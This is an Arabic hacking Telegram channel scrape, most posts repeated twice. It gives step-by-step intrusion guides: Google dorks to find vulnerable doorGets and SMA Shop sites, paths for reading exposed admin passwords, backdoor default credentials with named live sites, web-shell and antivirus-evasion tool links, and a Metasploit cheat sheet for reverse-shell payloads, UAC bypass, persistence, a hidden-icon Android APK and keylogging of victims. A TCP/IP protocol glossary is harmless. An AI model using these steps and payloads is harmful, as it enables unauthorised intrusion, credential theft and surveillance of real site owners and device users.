رابط تحميل تطبيق DroidSqli للأندرويد لاستغلال ثغرة Sql Injection
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd
#NullByteStream_team
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd
#NullByteStream_team
تثبيت الميتاسبلويت على التيرمكس بسهولة وبدون أي مشاكل
اكتب الأوامر التالية بالترتيب :
ستقوم الأداة بتحميل وتثبيت كل متطلبات البرنامج تلقائياً
بعد الانتهاء اكتب الأمر
لتشغيل الأداة
#NullByteStream_team
اكتب الأوامر التالية بالترتيب :
wget https://Auxilus.github.io/metasploit.sh
bash metasploit.shستقوم الأداة بتحميل وتثبيت كل متطلبات البرنامج تلقائياً
بعد الانتهاء اكتب الأمر
msfconsoleلتشغيل الأداة
#NullByteStream_team
Forwarded from Project Sigma - Advanced PT
Quick Script Encryption Tool - V1.0
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة
الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر
#NullByteStream_team
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة
الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
wget http://nullbytestream.tk/files/quick_encryption_tool.py
chmod 777 quick_encryption_tool.py
python2 quick_encryption_tool.py
الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
apt-get install python2
بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر
#NullByteStream_team
رابط تحميل أداة Droid Sqli لمن واجه مشاكل في الدخول إلى الرابط السابق
http://www.mediafire.com/file/046x6da3pr69nbb/DriodSQLi-net.edgard.droidsqli-1-v1.0.apk
#NullByteStream_team
http://www.mediafire.com/file/046x6da3pr69nbb/DriodSQLi-net.edgard.droidsqli-1-v1.0.apk
#NullByteStream_team
#تعلم_الاختراق
#الدرس_السادس
ثغرة Sql Injection
لمن واجه مشاكل في الدخول إلى رابط الدرس .. هذا الرابط الجديد المباشر
http://nullbytestream.tk/articles.php?id=929963882081210624
#NullByteStream_team
#الدرس_السادس
ثغرة Sql Injection
لمن واجه مشاكل في الدخول إلى رابط الدرس .. هذا الرابط الجديد المباشر
http://nullbytestream.tk/articles.php?id=929963882081210624
#NullByteStream_team
ملاحظات عن نظام لينوكس
msfpc
أمر تشغيل برنامج msfpc
مثلاً
msfconsole
سيقوم بتشغيل أداة الميتاسبلويت
هذا الملف التنفيذي msfconsole موجود في مسار محدد
/usr/bin
أو
/usr/sbin
حسب نظام جهازك
ولكن الفكرة أنه عند إضافة أي برنامج إلى هذا المجلد يمكنك تشغيله من أي مكان بكتابة اسمه فقط
أما
./filename
فهم أمر تشغيل الملف filename الموجود في المسار "نفسه"
لأنك وضعت /. قبل الاسم
أي إذا أردنا فتح ملف موجود هنا
/sdcard/folder/prog.sh
نغير المسار أولاً إلى داخل المجلد
cd /sdcard/folder
ثم نفتح الملف
./prog.sh
فإذا كتبنا الأمر الأخير بدون تغيير المسار لن يتم تشغيل البرنامج وسيظهر خطأ أن الملف غير موجود
بينما إذا قمت بنسخه إلى مجلد
/usr/bin
فيمكنك تشغيله فوراً بكتابة اسمه
prog
بدون /.
بالطبع قد تحتاج لتحويله لصيغة تنفيذية أو إنشاء launcher لا يهم .. وضعت هذه الأمثلة للفهم فقط
#NullByteStream_team
msfpc
أمر تشغيل برنامج msfpc
مثلاً
msfconsole
سيقوم بتشغيل أداة الميتاسبلويت
هذا الملف التنفيذي msfconsole موجود في مسار محدد
/usr/bin
أو
/usr/sbin
حسب نظام جهازك
ولكن الفكرة أنه عند إضافة أي برنامج إلى هذا المجلد يمكنك تشغيله من أي مكان بكتابة اسمه فقط
أما
./filename
فهم أمر تشغيل الملف filename الموجود في المسار "نفسه"
لأنك وضعت /. قبل الاسم
أي إذا أردنا فتح ملف موجود هنا
/sdcard/folder/prog.sh
نغير المسار أولاً إلى داخل المجلد
cd /sdcard/folder
ثم نفتح الملف
./prog.sh
فإذا كتبنا الأمر الأخير بدون تغيير المسار لن يتم تشغيل البرنامج وسيظهر خطأ أن الملف غير موجود
بينما إذا قمت بنسخه إلى مجلد
/usr/bin
فيمكنك تشغيله فوراً بكتابة اسمه
prog
بدون /.
بالطبع قد تحتاج لتحويله لصيغة تنفيذية أو إنشاء launcher لا يهم .. وضعت هذه الأمثلة للفهم فقط
#NullByteStream_team
Forwarded from Project Sigma (ÃŕMąŃđÒ)
يسمح بنشر أي شرح من شروحاتي على أي قناة أخرى ولكن عن طريق إعادة التوجيه أو بذكر رابط القناة فقط
رابط القناة التي نقلت الشرح منها
#ArMaNdO
رابط القناة التي نقلت الشرح منها
#ArMaNdO
Forwarded from Project Sigma - Advanced PT (ÃŕMąŃđÒ)
Quick Script Encryption Tool - v1.0
تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل
http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip
#NullByteStream_team
تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل
http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip
#NullByteStream_team
ثغرة بسيطة وسهلة للتجريب
الثغرة في سكريبت Doorgets
هذا المبرمج قام بتصميم السكريبت بطريقة يخزن فيها أسماء المستخدمين وكلمات السر كلها ضمن ملف بين ملفات الموقع (لا أعلم بم كان يفكر) وبهذه الطريقة يمكن الوصول إلى ملف كلمات السر من المتصفح
http://site.com/setup/temp/admin.php
(ملف كلمات سر لوحة التحكم)
http://site.com/setup/temp/database.php
(ملف كلمات سر قاعدة البيانات)
أظن السبب أنه لم يصممه بطريقة يمسح ملفات التثبيت بعد الانتهاء من تثبيت السكريبت على الموقع
أولاً : ابحث عن موقع مصاب في غوغل .. الدورك :
"Powered with doorGets ™" مع إشارات الاقتباس
ثانياً : اختر أحد المواقع .. انسخ عنوان الموقع
http://site.com
وأضف بعدها مسار ملف الإعدادات
http://site.com/setup/temp/admin.php
ستجد اسم المستخدم وكلمة السر
الآن عد إلى الصفحة الرئيسية للموقع للدخول إلى الحساب
http://site.com
اضغط على رمز 🙍♂️ أعلى ويمين الصفحة ثم اضغط sign in
أدخل اسم المستخدم وكلمة السر التي حصلت عليها ... ستجد نفسك داخل صفحة إدارة الموقع ... يمكنك إضافة مقالات أو إرسال رسائل لجميع المشتركين أو حتى يمكنك تغيير الإندكس (الindex هو الصفحة الرئيسية في كل مجلد بالموقع .. فعندما تدخل إلى الرابط
site.com
فإنك في الحقيقة تدخل إلى صفحة
site.com/index.php
قد يكون ملف الإندكس بامتداد php أو html , htm ........)
فعندما تغير ملف الإندكس الأساسي عندها سيظهر النص الذي تدخله لكل شخص يدخل إلى الموقع
قد تتمكن من رفع شيل لأنه يوجد عدة أماكن لرفع الملفات - جربها -
بالنسبة لأصحاب الخبرة الجيدة يمكنك الحصول على معلومات قاعدة البيانات من هنا
site.com/setup/temp/database.php
والتي تشمل عنوان الآي بي - اسم المستخدم - كلمة السر وإصدار قاعدة البيانات .. يمكنك الدخول إليها باستخدام برامج مثل hexorbase للكالي لينوكس
#Happy_Hacking 🙂
#NullByteStream_team
الثغرة في سكريبت Doorgets
هذا المبرمج قام بتصميم السكريبت بطريقة يخزن فيها أسماء المستخدمين وكلمات السر كلها ضمن ملف بين ملفات الموقع (لا أعلم بم كان يفكر) وبهذه الطريقة يمكن الوصول إلى ملف كلمات السر من المتصفح
http://site.com/setup/temp/admin.php
(ملف كلمات سر لوحة التحكم)
http://site.com/setup/temp/database.php
(ملف كلمات سر قاعدة البيانات)
أظن السبب أنه لم يصممه بطريقة يمسح ملفات التثبيت بعد الانتهاء من تثبيت السكريبت على الموقع
أولاً : ابحث عن موقع مصاب في غوغل .. الدورك :
"Powered with doorGets ™" مع إشارات الاقتباس
ثانياً : اختر أحد المواقع .. انسخ عنوان الموقع
http://site.com
وأضف بعدها مسار ملف الإعدادات
http://site.com/setup/temp/admin.php
ستجد اسم المستخدم وكلمة السر
الآن عد إلى الصفحة الرئيسية للموقع للدخول إلى الحساب
http://site.com
اضغط على رمز 🙍♂️ أعلى ويمين الصفحة ثم اضغط sign in
أدخل اسم المستخدم وكلمة السر التي حصلت عليها ... ستجد نفسك داخل صفحة إدارة الموقع ... يمكنك إضافة مقالات أو إرسال رسائل لجميع المشتركين أو حتى يمكنك تغيير الإندكس (الindex هو الصفحة الرئيسية في كل مجلد بالموقع .. فعندما تدخل إلى الرابط
site.com
فإنك في الحقيقة تدخل إلى صفحة
site.com/index.php
قد يكون ملف الإندكس بامتداد php أو html , htm ........)
فعندما تغير ملف الإندكس الأساسي عندها سيظهر النص الذي تدخله لكل شخص يدخل إلى الموقع
قد تتمكن من رفع شيل لأنه يوجد عدة أماكن لرفع الملفات - جربها -
بالنسبة لأصحاب الخبرة الجيدة يمكنك الحصول على معلومات قاعدة البيانات من هنا
site.com/setup/temp/database.php
والتي تشمل عنوان الآي بي - اسم المستخدم - كلمة السر وإصدار قاعدة البيانات .. يمكنك الدخول إليها باستخدام برامج مثل hexorbase للكالي لينوكس
#Happy_Hacking 🙂
#NullByteStream_team
#اختراق_الأجهزة
#الدرس_الثاني
- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088
#NullByteStream_team
#الدرس_الثاني
- اختراق الأجهزة البعيدة عبر شبكة الانترنت باستخدام بايلودات الميتاسبلويت Metasploit
- أفضل بديل لأداة ngrok
رابط الشرح
http://nullbytestream.tk/articles.php?id=256860720925033088
#NullByteStream_team
مجموعة مواقع مصابة للتجريب
هذا النوع من الثغرات يسمى backdoor account وهو عندما يقوم مصمم سكريبت الموقع بإضافة حساب إدارة مخفي ضمن كود السكريبت .. وهكذا يمكن الدخول إلى أي موقع يحوي هذا السكريبت عن طريق هذا الحساب
الدورك :
"© SMA Shop. All rights reserved."
أو
" product/minion-crazy "
بعد اختيار موقع والدخول إليه ندخل إلى لوحة التحكم
/admin
اسم المستخدم وكلمة السر :
owner@tecdiary.com
12345678
أو
admin@tecdiary.com
12345678
ستدخل إلى لوحة تحكم الموقع مباشرةً .. هذه المواقع هي مواقع تجارية shop
مواقع مصابة :
http://app.webagency.pk
لوحة التحكم :
http://app.webagency.pk/admin/
موقع ثاني :
http://sma.tecdiary.com
http://sma.tecdiary.com/admin
#NullByteStream_team
هذا النوع من الثغرات يسمى backdoor account وهو عندما يقوم مصمم سكريبت الموقع بإضافة حساب إدارة مخفي ضمن كود السكريبت .. وهكذا يمكن الدخول إلى أي موقع يحوي هذا السكريبت عن طريق هذا الحساب
الدورك :
"© SMA Shop. All rights reserved."
أو
" product/minion-crazy "
بعد اختيار موقع والدخول إليه ندخل إلى لوحة التحكم
/admin
اسم المستخدم وكلمة السر :
owner@tecdiary.com
12345678
أو
admin@tecdiary.com
12345678
ستدخل إلى لوحة تحكم الموقع مباشرةً .. هذه المواقع هي مواقع تجارية shop
مواقع مصابة :
http://app.webagency.pk
لوحة التحكم :
http://app.webagency.pk/admin/
موقع ثاني :
http://sma.tecdiary.com
http://sma.tecdiary.com/admin
#NullByteStream_team
expoilt
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/
#NullByteStream_team
موقع يحوي مجموعة من أقوى الشلات للتحميل
لرفعها على المواقع والتحكم بها
رابط الموقع
http://www.expoilt.com/
#NullByteStream_team
نسخة تلغرام الخاصة بنظام لينوكس
لا تحتاج إلى تثبيت
لا تحتاج إلى تثبيت
انسخ الملف التالي إلى جانب التطبيق ( للتحديثات ) 👇
Forwarded from Virtual]•[World]•[Kings منقول (ProMast3r 035)
يمكنك الان تثبيت الميتاسبلويت في termux
بكل سهولة عبر الامرين
#ProMast3r035
#VirtualWorldKings
بكل سهولة عبر الامرين
pkg install unstable-repo pkg install metasploit#ProMast3r035
#VirtualWorldKings
أنواع بروتوكولات TCP/IP
TCP/IP يتكون من مجموعة كبيرة من بروتوكولات الاتصالات المختلفة.
أنواع البروتوكولات
بداية يجب أن نوضح أن مجموعات بروتوكولات الاتصالات المختلفة تعتمد أساساً على بروتوكولين أصليين هما TCP و IP.
TCP - Transmission Control Protocol
يستخدم بروتوكول TCP لنقل البيانات من أحد التطبيقات إلى الشبكة. فبروتوكول TCP هو المسؤول عن تمرير البيانات إلى حزم الـ IP قبل إرسالها، وإعادة تجميع تلك الحزم عند استقبالها.
IP - Internet Protocol
بروتوكول الـ IP هو المسؤول عن الاتصالات مع أجهزة الحاسب الأخرى. فبروتوكول الـ IP يكون مسئولاً عن إرسال و استقبال حزم البيانات من وإلى شبكة الإنترنت.
HTTP - Hyper Text Transfer Protocol
بروتوكول HTTP هو المسؤول عن الاتصال بين خادم الويب (web server ) ومتصفح الويب ( web browser ) .
فبروتوكول HTTP يستخدم لإرسال طلب من جهازك (web client) عبر المتصفح إلى خادم الويب، وإعادة الطلب في شكل صفحات الويب من الخادم إلى متصفح العميل.
HTTPS - Secure HTTP
بروتوكول HTTPS هو المسؤول عن الاتصال الآمن بين خادم الويب ومتصفح الويب، فبروتوكول HTTPS يقوم على تنفيذ تعاملات البطاقات الائتمان والبيانات الحساسة الأخرى.
SSL - Secure Sockets Layer
يستخدم بروتوكول SSL لتشفير البيانات لنقل البيانات المؤمنة.
SMTP - Simple Mail Transfer Protocol
يستخدم بروتوكول SMTP لإرسال البريد الإلكتروني.
IMAP - Internet Message Access Protocol
يستخدم بروتوكول IMAP لتخزين واسترجاع البريد الإلكتروني.
POP - Post Office Protocol
يستخدم بروتوكول POP لتنزيل البريد الإلكتروني من خادم البريد الإلكتروني إلى حاسبك الشخصي.
FTP - File Transfer Protocol
بروتوكول FTP هو المسؤول عن نقل الملفات بين أجهزة الحاسب الآلي.
NTP - Network Time Protocol
يستخدم بروتوكول NTP لمزامنة الوقت (الساعة) بين أجهزة الحاسب الآلي.
DHCP - Dynamic Host Configuration Protocol
يستخدم بروتوكول DHCP لتخصيص عناوين IP لأجهزة الحاسب الآلي في شبكة الاتصال.
SNMP - Simple Network Management Protocol
يستخدم بروتوكول SNMP لإدارة شبكات الحاسب الآلي.
LDAP - Lightweight Directory Access Protocol
يستخدم بروتوكول LDAP لجمع المعلومات حول المستخدمين و عناوين البريد الإلكتروني من الإنترنت.
ICMP - Internet Control Message Protocol
بروتوكول ICMP يقوم على معالجة الأخطاء في الشبكة.
ARP - Address Resolution Protocol
يستخدم بروتوكول ARP بواسطة الـ IP لإيجاد عناوين ( معرفات ) الأجهزة من خلال بطاقة شبكة الحاسب اعتماداً على عناوين الـ IP.
RARP - Reverse Address Resolution Protocol
يستخدم بروتوكول RARP بواسطة الـ IP لإيجاد عناوين الـ IP اعتماداً على عناوين الأجهزة من خلال بطاقة شبكة الحاسب.
BOOTP - Boot Protocol
يستخدم بروتوكول BOOTP لبدء تشغيل الحاسب الآلي من الشبكة.
PPTP - Point to Point Tunneling Protocol
يستخدم برتوكول PPTP لإعداد قناة اتصال بين الشبكات الخاصة.
#منقول
Eng.Ahmad Al- Mashaikh
TCP/IP يتكون من مجموعة كبيرة من بروتوكولات الاتصالات المختلفة.
أنواع البروتوكولات
بداية يجب أن نوضح أن مجموعات بروتوكولات الاتصالات المختلفة تعتمد أساساً على بروتوكولين أصليين هما TCP و IP.
TCP - Transmission Control Protocol
يستخدم بروتوكول TCP لنقل البيانات من أحد التطبيقات إلى الشبكة. فبروتوكول TCP هو المسؤول عن تمرير البيانات إلى حزم الـ IP قبل إرسالها، وإعادة تجميع تلك الحزم عند استقبالها.
IP - Internet Protocol
بروتوكول الـ IP هو المسؤول عن الاتصالات مع أجهزة الحاسب الأخرى. فبروتوكول الـ IP يكون مسئولاً عن إرسال و استقبال حزم البيانات من وإلى شبكة الإنترنت.
HTTP - Hyper Text Transfer Protocol
بروتوكول HTTP هو المسؤول عن الاتصال بين خادم الويب (web server ) ومتصفح الويب ( web browser ) .
فبروتوكول HTTP يستخدم لإرسال طلب من جهازك (web client) عبر المتصفح إلى خادم الويب، وإعادة الطلب في شكل صفحات الويب من الخادم إلى متصفح العميل.
HTTPS - Secure HTTP
بروتوكول HTTPS هو المسؤول عن الاتصال الآمن بين خادم الويب ومتصفح الويب، فبروتوكول HTTPS يقوم على تنفيذ تعاملات البطاقات الائتمان والبيانات الحساسة الأخرى.
SSL - Secure Sockets Layer
يستخدم بروتوكول SSL لتشفير البيانات لنقل البيانات المؤمنة.
SMTP - Simple Mail Transfer Protocol
يستخدم بروتوكول SMTP لإرسال البريد الإلكتروني.
IMAP - Internet Message Access Protocol
يستخدم بروتوكول IMAP لتخزين واسترجاع البريد الإلكتروني.
POP - Post Office Protocol
يستخدم بروتوكول POP لتنزيل البريد الإلكتروني من خادم البريد الإلكتروني إلى حاسبك الشخصي.
FTP - File Transfer Protocol
بروتوكول FTP هو المسؤول عن نقل الملفات بين أجهزة الحاسب الآلي.
NTP - Network Time Protocol
يستخدم بروتوكول NTP لمزامنة الوقت (الساعة) بين أجهزة الحاسب الآلي.
DHCP - Dynamic Host Configuration Protocol
يستخدم بروتوكول DHCP لتخصيص عناوين IP لأجهزة الحاسب الآلي في شبكة الاتصال.
SNMP - Simple Network Management Protocol
يستخدم بروتوكول SNMP لإدارة شبكات الحاسب الآلي.
LDAP - Lightweight Directory Access Protocol
يستخدم بروتوكول LDAP لجمع المعلومات حول المستخدمين و عناوين البريد الإلكتروني من الإنترنت.
ICMP - Internet Control Message Protocol
بروتوكول ICMP يقوم على معالجة الأخطاء في الشبكة.
ARP - Address Resolution Protocol
يستخدم بروتوكول ARP بواسطة الـ IP لإيجاد عناوين ( معرفات ) الأجهزة من خلال بطاقة شبكة الحاسب اعتماداً على عناوين الـ IP.
RARP - Reverse Address Resolution Protocol
يستخدم بروتوكول RARP بواسطة الـ IP لإيجاد عناوين الـ IP اعتماداً على عناوين الأجهزة من خلال بطاقة شبكة الحاسب.
BOOTP - Boot Protocol
يستخدم بروتوكول BOOTP لبدء تشغيل الحاسب الآلي من الشبكة.
PPTP - Point to Point Tunneling Protocol
يستخدم برتوكول PPTP لإعداد قناة اتصال بين الشبكات الخاصة.
#منقول
Eng.Ahmad Al- Mashaikh
اداة لتخطي مكافحات الفيروسات
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت
$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py
#PlusX4
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت
$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py
#PlusX4
GitHub
GitHub - oddcod3/Phantom-Evasion: Python antivirus evasion tool
Python antivirus evasion tool . Contribute to oddcod3/Phantom-Evasion development by creating an account on GitHub.
استغلال بعض ثغرات MetaSploit 💻
________________________________________________
أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery
+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
+) أوامر الأستغلال ~>
$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>
________________________________________________
تخطي UAC باستغلال ثغرة ASK
+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives
________________________________________________
استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit
________________________________________________
اختراق الأجهزة بإستخدام سكربت بلغة الباثيون
+) صنع السكربت الملغم ~>
$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
_________________________________________________
اختراق الاندرويد عن طريق بايلود apk ملغم
+) صنع بايلود ملغم ~>
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk
+) الأستغلال ~>
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon
_________________________________________________
التنصت على لوحة مفاتيح الضحية
+) أوامر الأستغلال ~>
$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit
________________________________________________
نقل عملية الاختراق داخل proceess عند قتل البايلود
+) أوامر الأستغلال ~>
$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
________________________________________________
تلغيم ملفات Microsoft Offic
+) أمر تلغيم ~>
$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
________________________________________________
#PlusX4
________________________________________________
أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery
+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
+) أوامر الأستغلال ~>
$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>
________________________________________________
تخطي UAC باستغلال ثغرة ASK
+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives
________________________________________________
استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit
________________________________________________
اختراق الأجهزة بإستخدام سكربت بلغة الباثيون
+) صنع السكربت الملغم ~>
$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
_________________________________________________
اختراق الاندرويد عن طريق بايلود apk ملغم
+) صنع بايلود ملغم ~>
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk
+) الأستغلال ~>
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon
_________________________________________________
التنصت على لوحة مفاتيح الضحية
+) أوامر الأستغلال ~>
$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit
________________________________________________
نقل عملية الاختراق داخل proceess عند قتل البايلود
+) أوامر الأستغلال ~>
$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
________________________________________________
تلغيم ملفات Microsoft Offic
+) أمر تلغيم ~>
$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
________________________________________________
#PlusX4